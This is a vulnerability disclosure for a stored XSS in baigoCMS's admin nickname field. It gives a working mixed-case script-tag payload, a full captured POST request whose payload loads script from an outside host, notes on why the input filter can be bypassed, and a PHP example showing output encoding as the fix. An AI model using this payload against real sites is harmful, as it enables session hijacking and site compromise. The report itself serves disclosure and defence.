An XSS vulnerability was discovered in baigoCMS.
There is a persistent (stored) XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the admin_nick form parameter POSTed to
/public/console/profile/info-submit/
POC:
XSS payload: <sCRiPt/SrC=//your js>
POST /public/console/profile/info-submit/?1570709270213at0.7949324520660688 HTTP/1.1
Host: ad.com
Proxy-Connection: keep-alive
Content-Length: 116
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://ad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://ad.com/public/console/profile/info/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: baigo_sso_admin_id=1; baigo_sso_admin_hash=62bcd73f59081180cdda5bdf87d86b40; baigo_sso_admin_login_type=form; baigo_sso_admin_cookie_time=1570709261; PHPSESSID=268dc2000398555211fc455bbc0ded26; BX=8k8fbjteptoil&b=3&s=5v; baigoSSOssinID=0de8f68574d90c91896a1ee2a2f1dcaa

__token__=417102b0cdb072c660d1dca097b83ac1&admin_pass=123123&admin_nick=%3CsCRiPt%2FSrC%3D%2F%2F%C3%A7.top%2FImLm%3E
Submit this form; after refreshing the page, the injected script is executed, confirming that the payload was stored.
Vulnerability Analysis
Filename: app/ctrl/console/profile.ctrl.php, function: infoSubmit, line 70. The input content is passed through a filter here.
Following this flow further:
Because the incoming argument is an array, execution goes into the fillParam method at line 352.
At line 826 it enters the safe function, which filters the input content.
The filter checks the input for XSS and SQL injection patterns, but it can be bypassed.
Payload:
<sCRiPt/SrC=//js>
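As an added example (not baigoCMS code; the names naiveInputFilter and encodeForHtml and the blacklist contents are assumptions chosen here), the PHP below shows why a keyword-blacklist input filter misses the mixed-case, slash-separated payload from the report, and that context-aware output encoding with htmlspecialchars neutralises it regardless of spelling:

```php
<?php
// Added example, not baigoCMS code. Contrasts a hypothetical blacklist-style
// input filter with HTML output encoding for the admin_nick value.

// Hypothetical keyword blacklist of the kind an input "safe" filter might use.
// It only matches literal, lowercase, space-separated tokens.
function naiveInputFilter(string $value): string
{
    $blocked = ['<script ', '</script>', 'javascript:', 'onerror='];
    foreach ($blocked as $token) {
        $value = str_replace($token, '', $value);
    }
    return $value;
}

// Mitigation: encode at output time for the HTML body context so that
// "<", ">", quotes and "&" can never start a tag or attribute.
function encodeForHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Returns true if a lowercase "<script" tag start survives the given text;
// the HTML tokenizer accepts "/" in place of the space after a tag name.
function containsScriptTagStart(string $value): bool
{
    return strpos(strtolower($value), '<script') !== false;
}

// Payload from the report: mixed case and "/" instead of a space.
$adminNick = '<sCRiPt/SrC=//your js>';

$afterFilter = naiveInputFilter($adminNick);
echo 'after blacklist filter: ' . $afterFilter . PHP_EOL;
echo 'tag start still present: ' . var_export(containsScriptTagStart($afterFilter), true) . PHP_EOL;

$encoded = encodeForHtml($adminNick);
echo 'after output encoding:  ' . $encoded . PHP_EOL;
echo 'tag start still present: ' . var_export(containsScriptTagStart($encoded), true) . PHP_EOL;
```

The encoded value stores the nickname unchanged in the database and only escapes it when rendered, which is the fix for a stored XSS of this kind; a blacklist applied on input is not.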